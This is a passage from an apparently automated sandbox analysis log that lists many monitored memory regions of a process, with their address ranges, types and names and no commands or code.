0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15991 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15992 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15993 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15994 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15995 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16008 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16009 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16049 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16050 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16053 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16062 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16063 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16067 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16068 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16069 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16070 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16071 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16072 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16073 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16074 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16075 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16087 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16088 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16092 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16093 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16094 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16095 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16096 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16097 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16098 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16099 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16100 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16101 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16102 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16103 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16104 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16105 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16124 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16125 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16126 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16127 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16128 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16173 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16174 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16175 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16176 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = 